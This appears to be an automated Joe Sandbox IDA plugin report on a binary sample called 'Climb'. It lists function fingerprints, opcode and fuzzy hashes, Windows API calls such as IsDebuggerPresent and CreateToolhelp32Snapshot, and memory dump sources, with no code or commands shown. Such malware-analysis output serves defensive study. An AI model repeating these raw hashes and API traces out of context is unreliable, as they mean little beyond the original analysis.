                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 687a785f257fc0fed399ac205deb9e9c75ad48ca2843c65211c65c7bbe000cf7
                                                                                                                                                                          • Instruction ID: 56b41c7634596729eab3c5de0d6eee84e819e57ab02e6472054b57b33d1d4259
                                                                                                                                                                          • Opcode Fuzzy Hash: 687a785f257fc0fed399ac205deb9e9c75ad48ca2843c65211c65c7bbe000cf7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4432AE70A00205DFCB24EF68CD85EEEB7B8AF04314F14C559E919AB2A2E735ED54CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00AA413B
                                                                                                                                                                            • Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871
                                                                                                                                                                            • Part of subcall function 00A63A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A63A76
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                          • String ID: X
                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                          • Opcode ID: 425015161cc3a592d523e3ef26bcba2784479b6ffe03cb4ddb92e516657186a6
                                                                                                                                                                          • Instruction ID: b07a6fcc39a38f8f4496d4ef81fee72bce8f326813b2979b4ff5c42a1d439f3f
                                                                                                                                                                          • Opcode Fuzzy Hash: 425015161cc3a592d523e3ef26bcba2784479b6ffe03cb4ddb92e516657186a6
                                                                                                                                                                          • Instruction Fuzzy Hash: E521A171A002589BCB01DFE4C905BEE7BF8AF49300F008059E545A7281DFF99A898F61
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00A8007D
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8008F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3280610774-0
                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction ID: fbd9b26ed6858e9e84ed6fee9c5224fcf09ea942cf834d6c2c1db7d75cb37bdf
                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction Fuzzy Hash: D131D270A00109DFC798EF58D490E69FBB6FB59300B2486A5E44ACB656D732EDC5CBC0
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63A3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: 729884755e4694db70bbc9967624331f068c4e9fb6706a7bd179cfd8324dcbc3
                                                                                                                                                                          • Instruction ID: f5cb12a87c2648f40de8b6d07de8878a9c06726ed10e4d90dfd352cd79129571
                                                                                                                                                                          • Opcode Fuzzy Hash: 729884755e4694db70bbc9967624331f068c4e9fb6706a7bd179cfd8324dcbc3
                                                                                                                                                                          • Instruction Fuzzy Hash: FA31D2726043009FD721DF64D88479BBBF8FB49308F00092EF6D987281E7B5A948CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsThemeActive.UXTHEME ref: 00A6333D
                                                                                                                                                                            • Part of subcall function 00A632E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A632FB
                                                                                                                                                                            • Part of subcall function 00A632E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A63312
                                                                                                                                                                            • Part of subcall function 00A6338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A63368,?), ref: 00A633BB
                                                                                                                                                                            • Part of subcall function 00A6338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A63368,?), ref: 00A633CE
                                                                                                                                                                            • Part of subcall function 00A6338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B32418,00B32400,?,?,?,?,?,?,00A63368,?), ref: 00A6343A
                                                                                                                                                                            • Part of subcall function 00A6338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A634BB
                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A63377
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1550534281-0
                                                                                                                                                                          • Opcode ID: 06e0e870bbe6da09797e9313ea1927cdcf75da90d8f077702ff3b346726502df
                                                                                                                                                                          • Instruction ID: d897ecec70a1cd4fa8d0f42f7609f99d335f5de4ccddd1106c8f82cea48506c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 06e0e870bbe6da09797e9313ea1927cdcf75da90d8f077702ff3b346726502df
                                                                                                                                                                          • Instruction Fuzzy Hash: 54F05E72954744AFD701AFB0EE0BB6C37A4E700709F244819B6098B1E2DFBA8156CB48
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00A6CEEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                          • Opcode ID: 46aa2eac7afe66aef523089323ce5cd25c1b92e3827ca3b074810706e6bda410
                                                                                                                                                                          • Instruction ID: a8e9b27521297e24edbd14364ccb4378fc923e339cc3a7f26fedb7c8d1e5c2f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 46aa2eac7afe66aef523089323ce5cd25c1b92e3827ca3b074810706e6bda410
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E32E175A00205EFCB20CF58C894ABEB7F9FF45360F648059E956AB252CB35ED81CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                          • Opcode ID: 014c10c2368624ee91d0d2c9b0a2ab5480967dd832283009b2ebeacef8e2f118
                                                                                                                                                                          • Instruction ID: 9710510af79cff7f00c8ab4145058d16cc7953905adb142903acae938f4b45cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 014c10c2368624ee91d0d2c9b0a2ab5480967dd832283009b2ebeacef8e2f118
                                                                                                                                                                          • Instruction Fuzzy Hash: 94D15C74A04249EFCB14EF99C9819EDBBB5FF48310F148159E915AB391DB30AE81CF90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 87e7ad439ee7dafe9f03b4dac14527d3402add14c2aedddc69a0333e6778e7be
                                                                                                                                                                          • Instruction ID: 3b5581226c94efcc905d661a04f0036b415a2f3f69cd5bf50b8df523f497612c
                                                                                                                                                                          • Opcode Fuzzy Hash: 87e7ad439ee7dafe9f03b4dac14527d3402add14c2aedddc69a0333e6778e7be
                                                                                                                                                                          • Instruction Fuzzy Hash: 6151B575A00109AFDB10EF68C845FE97BB5EF85364F198268E8189B391E731ED42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00ACFCCE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                          • Opcode ID: 892fe5c993be3fe149636f99a39bb07f1dfb130ab85578f3af586885e71be356
                                                                                                                                                                          • Instruction ID: 3285bfa1f77cd9e800006a5f228cca7513f886184b52f73738e3c4797f21d835
                                                                                                                                                                          • Opcode Fuzzy Hash: 892fe5c993be3fe149636f99a39bb07f1dfb130ab85578f3af586885e71be356
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41A476600209AFCB12EFA8C881EAEB7B9EF44314B21453EE91797251EB70DE05CB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6664A
                                                                                                                                                                            • Part of subcall function 00A6663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A6665C
                                                                                                                                                                            • Part of subcall function 00A6663E: FreeLibrary.KERNEL32(00000000,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6666E
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A666AB
                                                                                                                                                                            • Part of subcall function 00A66607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66610
                                                                                                                                                                            • Part of subcall function 00A66607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A66622
                                                                                                                                                                            • Part of subcall function 00A66607: FreeLibrary.KERNEL32(00000000,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66635
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                          • Opcode ID: 60e826c691f5933c377890582e40bb3caf62baa252d47f5b042c5deae8a33b4f
                                                                                                                                                                          • Instruction ID: 294afcdb24e2a3fef2bc0272ce00a96c07790650d1830c3b7d18e142ef64d80e
                                                                                                                                                                          • Opcode Fuzzy Hash: 60e826c691f5933c377890582e40bb3caf62baa252d47f5b042c5deae8a33b4f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7811E376600205ABCF18BB74DA02BAD7BB5AF50710F10482DF452A71C2EFB1EA05DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                          • Opcode ID: c5f3e2371a10f9d8d5f293e6384c5e03478114224bfa64faca61733c2616cd95
                                                                                                                                                                          • Instruction ID: 38c0e8c08711fc33d656963e6893528507d27156953d35f4db0ef2074bfb6bb2
                                                                                                                                                                          • Opcode Fuzzy Hash: c5f3e2371a10f9d8d5f293e6384c5e03478114224bfa64faca61733c2616cd95
                                                                                                                                                                          • Instruction Fuzzy Hash: 65112A76A0410AAFCF05DF98E945DDE7BF8EF49310F114069F809AB311DA31EA11CB65
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction ID: 3e15e37893e388c1e9d3cf1e57519c63a27d5d4012cf927cac1fca9d32243c6b
                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0A432601620DADA317A7ADD05B6A7BD89F42334F100726F525D71D1EAB4E80287D2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00ADF987
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                          • Opcode ID: 6d1995e716386309a7ba6213fb29b1fadfff85563c54a28e78276f50a3209cf9
                                                                                                                                                                          • Instruction ID: a383fe5055f00ef58adaecf99bc4db98b1f7845852cf7c665b9371ae06128004
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d1995e716386309a7ba6213fb29b1fadfff85563c54a28e78276f50a3209cf9
                                                                                                                                                                          • Instruction Fuzzy Hash: B7F03C72A00204BFCB01EBA5DD4AD9FBBB9EF49720F004055F5059B361DA74EA45C761
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 26980c538341caa6f36ce613e7739757291ec73ff126a30a25682dccaa49c208
                                                                                                                                                                          • Instruction ID: 3511df78beb22183db69fae760dbc7f4a5ddc39e1f54086dcc1d0dc5456231d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 26980c538341caa6f36ce613e7739757291ec73ff126a30a25682dccaa49c208
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DE06D73740621AADF2137B69C01B9A3AF8AF413A0F150261FC69EA591EF70DE4086A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3b079350db15501515ba5a3d7cd87966b7f3f1217d9f41fabf0dc0dc5532e14b
                                                                                                                                                                          • Instruction ID: 6405ed0199b6f7398949a2d0fd2cd107aba66b1b12dd3668fd5bda22e02c38b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b079350db15501515ba5a3d7cd87966b7f3f1217d9f41fabf0dc0dc5532e14b
                                                                                                                                                                          • Instruction Fuzzy Hash: C1F039B1505702CFCB349FA4D8A0826BBF5BF143293248A3EE2E687610C7729880DF14
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                          • Opcode ID: 3423bd93b678fa79b22035e0dc360caa15dd7542121716c1ad23a4f6e985a4c2
                                                                                                                                                                          • Instruction ID: 025bf863ae9b406d6f7ba4be6801b888899a62e9db3d75156657bdc3dfe9973d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3423bd93b678fa79b22035e0dc360caa15dd7542121716c1ad23a4f6e985a4c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 24F0EDB1704600AAEB209BA89C09BF1FBFCAB00315F14C61ED5D9C2182D7BA4494A7A2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
